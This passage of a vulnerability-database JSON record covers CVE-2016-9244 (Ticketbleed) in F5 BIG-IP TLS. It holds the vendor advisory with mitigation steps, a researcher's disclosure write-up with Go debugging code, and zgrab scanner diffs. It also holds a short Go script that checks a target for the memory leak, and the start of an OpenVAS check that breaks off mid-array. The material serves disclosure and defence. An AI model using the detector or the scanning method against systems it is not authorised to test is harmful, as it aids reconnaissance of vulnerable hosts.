"cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.4.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-04-30T18:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-9244"], "description": "\nF5 Product Development has assigned ID 596340 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H638510 on the **Diagnostics** > **Identified** > **High** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None \n| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3 \n11.2.1| High| BIG-IP virtual server* \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 HF1 \n11.6.1 HF2 \n11.5.4 HF3| High| BIG-IP virtual server* \nBIG-IP PSM| 11.4.0 - 11.4.1| None| High| BIG-IP virtual server* \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable | None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable \n\n| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable | None \nEnterprise Manager| None| 3.1.1| Not vulnerable | None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None \n \n* The BIG-IP virtual server is associated with the Client SSL profile that has the Session Ticket option enabled.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can disable the Session Ticket option on the affected Client SSL profile. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** >** Profiles **> **SSL** > **Client**.\n 3. For the **Configuration **option, select **Advanced**.\n 4. Clear the **Session Ticket** check box.\n 5. Click **Update**.\n\nF5 would like to acknowledge Cloudflare Cryptography Engineer Filippo Valsorda for bringing this issue to our attention and for following the highest standards of responsible disclosure.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2017-05-12T19:58:00", "published": "2017-02-09T04:23:00", "id": "F5:K05121675", "href": "https://support.f5.com/csp/article/K05121675", "title": "F5 TLS vulnerability CVE-2016-9244", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:31", "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\r\n\r\nIf you suspect you might be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](https://ticketbleed.com) (including an online test) or in the [F5 K05121675 article](https://support.f5.com/csp/article/K05121675).\r\n\r\n\r\n\r\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\r\n\r\n## JIRA RG-XXX\r\n\r\nIt all started with a bug report from a customer using Cloudflare [Railgun](https://www.cloudflare.com/website-optimization/railgun/).\r\n\r\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\r\n> \r\n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\r\n> \r\n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: `visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\r\n> \r\n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\r\n\r\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\r\n\r\n\r\n\r\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. This means that the whole connection goes through the Go TLS stack, crypto/tls.\r\n\r\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\r\n\r\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\r\n\r\n## PCAP diving\r\n\r\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\r\n\r\nHere's the PCAP we were staring at.\r\n\r\n\r\n\r\n\r\n\r\n\r\nSo, there's the ClientHello, right. The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\r\n\r\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\r\n\r\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\r\n\r\n\r\n\r\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\r\n\r\n\r\n\r\n\r\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/), [read the transcript](https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/), or the [\"TLS Session Resumption\" post](https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/) on the Cloudflare blog._\r\n\r\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? Umh?). So we have reason to believe the issue is related to Session Tickets.\r\n\r\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. We verified that indeed Railgun uses this functionality and wrote this small test:\r\n\r\n```\r\npackage main\r\n\r\nimport ( \r\n \"crypto/tls\"\r\n)\r\n\r\nfunc main() { \r\n conf := &tls.Config{\r\n InsecureSkipVerify: true,\r\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\r\n }\r\n\r\n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\r\n if err != nil {\r\n panic(\"failed to connect: \" + err.Error())\r\n }\r\n conn.Close()\r\n\r\n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\r\n if err != nil {\r\n panic(\"failed to resume: \" + err.Error())\r\n }\r\n conn.Close()\r\n}\r\n\r\n```\r\n\r\nAnd sure enough, `local error: unexpected message`.\r\n\r\n## crypto/tls diving\r\n\r\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\r\n\r\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. That function is usually called from the site of the error.\r\n\r\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\r\n\r\n```\r\ndiff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go \r\nindex 77fd6d3254..017350976a 100644 \r\n--- a/src/crypto/tls/conn.go\r\n+++ b/src/crypto/tls/conn.go\r\n@@ -150,8 +150,7 @@ type halfConn struct {\r\n }\r\n\r\n func (hc *halfConn) setErrorLocked(err error) error {\r\n- hc.err = err\r\n- return err\r\n+ panic(err)\r\n }\r\n\r\n // prepareCipherSpec sets the encryption and MAC states\r\n\r\n```\r\n\r\n```\r\npanic: local error: tls: unexpected message\r\n\r\ngoroutine 1 [running]: \r\npanic(0x185340, 0xc42006fae0) \r\n /Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\r\ncrypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\r\ncrypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\r\ncrypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\r\ncrypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\r\ncrypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\r\ncrypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55) \r\n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\r\ncrypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988) \r\n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\r\ncrypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\r\ncrypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118) \r\n /Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\r\ncrypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0) \r\n /Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\r\n\r\n```\r\n\r\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\r\n\r\n```\r\n 670 case recordTypeChangeCipherSpec:\r\n 671 if typ != want || len(data) != 1 || data[0] != 1 {\r\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\r\n 673 break\r\n 674 }\r\n 675 err := c.in.changeCipherSpec()\r\n 676 if err != nil {\r\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\r\n 678 }\r\n\r\n```\r\n\r\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\r\n\r\n```\r\n 259 func (hs *clientHandshakeState) doFullHandshake() error {\r\n 260 c := hs.c\r\n 261\r\n 262 msg, err := c.readHandshake()\r\n 263 if err != nil {\r\n 264 return err\r\n 265 }\r\n\r\n```\r\n\r\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\r\n\r\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\r\n\r\n## RFC diving\r\n\r\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\r\n\r\n[RFC 5077](https://tools.ietf.org/html/rfc5077), which obsoletes RFC 4507, says:\r\n\r\n> When presenting a ticket, the client MAY generate and include a Session ID in the TLS ClientHello. If the server accepts the ticket and the Session ID is not empty, then it MUST respond with the same Session ID present in the ClientHello.\r\n\r\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\r\n\r\nThe code in `crypto/tls`, clear as always, does exactly that.\r\n\r\n```\r\nfunc (hs *clientHandshakeState) serverResumedSession() bool { \r\n // If the server responded with the same sessionId then it means the\r\n // sessionTicket is being used to resume a TLS session.\r\n return hs.session != nil && hs.hello.sessionId != nil &&\r\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\r\n}\r\n\r\n```\r\n\r\n## Session IDs diving\r\n\r\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\r\n\r\n```\r\ndiff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go \r\nindex f789e6f888..2868802d82 100644 \r\n--- a/src/crypto/tls/handshake_client.go\r\n+++ b/src/crypto/tls/handshake_client.go\r\n@@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\r\n func (hs *clientHandshakeState) serverResumedSession() bool {\r\n // If the server responded with the same sessionId then it means the\r\n // sessionTicket is being used to resume a TLS session.\r\n+ println(hex.Dump(hs.hello.sessionId))\r\n+ println(hex.Dump(hs.serverHello.sessionId))\r\n return hs.session != nil && hs.hello.sessionId != nil &&\r\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\r\n }\r\n\r\n```\r\n\r\n```\r\n00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\r\n\r\n00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.| \r\n00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \r\n\r\n```\r\n\r\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. crypto/tls in Go uses 16 byte Session IDs.\r\n\r\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\r\n\r\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](https://bugs.chromium.org/p/chromium/issues/detail?id=315828).\r\n\r\nI was about to write this up as just another real world TLS quirk when...\r\n\r\n```\r\n00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\r\n\r\n00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%| \r\n00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.| \r\n\r\n```\r\n\r\nUh oh. Wait. Those are not zeroes. That's not padding. That's... memory?\r\n\r\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. The server is allocating a buffer as big as the client's Session ID, and then sending back always 32 bytes, bringing along whatever unallocated memory was in the extra bytes.\r\n\r\n## Browser diving\r\n\r\nI had one last source of skepticism: how could this not have been noticed before?\r\n\r\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908).\r\n\r\n```\r\n /* Generate a session ID for this session based on the session ticket. We use\r\n * the session ID mechanism for detecting ticket resumption. This also fits in\r\n * with assumptions elsewhere in OpenSSL.*/\r\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\r\n session->session_id, &session->session_id_length,\r\n EVP_sha256(), NULL)) {\r\n goto err;\r\n }\r\n\r\n```\r\n\r\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\r\n\r\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\r\n\r\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\r\n\r\n## Disclosure diving\r\n\r\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\r\n\r\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\r\n\r\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\r\n\r\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed Challenge](https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/) taught us not to make assumptions of safety with uninitialized memory.\r\n\r\nIn planning a timeline, the F5 team was faced with a rigid release schedule. Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html): 90 days with 15 days of grace period if a fix is due to be released.\r\n\r\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\r\n\r\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\r\n\r\nThe issue was assigned CVE-2016-9244.\r\n\r\n## Internet diving\r\n\r\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\r\n\r\nThis was the perfect occasion to perform an Internet scan. I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\r\n\r\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\r\n\r\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\r\n\r\n```\r\ndiff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go \r\nindex e6c506b..af098d3 100644 \r\n--- a/ztools/ztls/handshake_client.go\r\n+++ b/ztools/ztls/handshake_client.go\r\n@@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\r\n session, sessionCache = nil, nil\r\n hello.ticketSupported = true\r\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\r\n- hello.sessionId = make([]byte, 32)\r\n+ hello.sessionId = make([]byte, 32-1)\r\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\r\n c.sendAlert(alertInternalError)\r\n return errors.New(\"tls: short read from Rand: \" + err.Error())\r\n@@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\r\n\r\n if c.config.FixedSessionTicket != nil {\r\n c.resumption = &Resumption{\r\n- Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\r\n- SessionID: hs.serverHello.sessionId,\r\n+ Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\r\n+ TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\r\n+ bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\r\n+ ServerSessionID: hs.serverHello.sessionId,\r\n+ ClientSessionID: hs.hello.sessionId,\r\n }\r\n return false, FixedSessionTicketError\r\n }\r\n\r\n```\r\n\r\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\r\n\r\nI then downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\r\n\r\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\r\n\r\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\r\n\r\n## Read more\r\n\r\nFor more details visit the [F5 K05121675 article](https://support.f5.com/csp/article/K05121675) or [ticketbleed.com](https://ticketbleed.com), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\r\n\r\nOtherwise, you might want to [follow me on Twitter](https://twitter.com/FiloSottile).", "published": "2017-02-10T00:00:00", "type": "seebug", "title": "F5 TLS vulnerability (CVE-2016-9244)\n (Ticketbleed)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92673", "id": "SSV:92673", "sourceData": "\n package main\r\n\r\nimport (\r\n\t\"crypto/tls\"\r\n\t\"fmt\"\r\n\t\"log\"\r\n\t\"strings\"\r\n)\r\n\r\nvar Target = \"example.com:443\"\r\n\r\nfunc main() {\r\n\tconf := &tls.Config{\r\n\t\tInsecureSkipVerify: true,\r\n\t\tClientSessionCache: tls.NewLRUClientSessionCache(32),\r\n\t}\r\n\r\n\tconn, err := tls.Dial(\"tcp\", Target, conf)\r\n\tif err != nil {\r\n\t\tlog.Fatalln(\"Failed to connect:\", err)\r\n\t}\r\n\tconn.Close()\r\n\r\n\tconn, err = tls.Dial(\"tcp\", Target, conf)\r\n\tif err != nil && strings.Contains(err.Error(), \"unexpected message\") {\r\n\t\tfmt.Println(Target, \"is vulnerable to Ticketbleed\")\r\n\t} else if err != nil {\r\n\t\tlog.Fatalln(\"Failed to reconnect:\", err)\r\n\t} else {\r\n\t\tfmt.Println(Target, \"does NOT appear to be vulnerable\")\r\n\t\tconn.Close()\r\n\t}\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92673"}], "openvas": [{"lastseen": "2020-04-07T18:28:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "description": "A BIG-IP SSL virtual server with the non-default Session Tickets option\n enabled may leak up to 31 bytes of uninitialized memory.", "modified": "2020-04-03T00:00:00", "published": "2017-02-09T00:00:00", "id": "OPENVAS:1361412562310140155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140155", "type": "openvas", "title": "F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140155\");\n script_cve_id(\"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K05121675\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A BIG-IP SSL virtual server with the non-default Session Tickets option\n enabled may leak up to 31 bytes of uninitialized memory.\");\n\n script_tag(name:\"impact\", value:\"A BIG-IP virtual server configured with a Client SSL profile that has the\n non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacke\n may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is\n possible that other data from uninitialized memory may be returned as well.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-09 09:58:08 +0100 (Thu, 09 Feb 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' 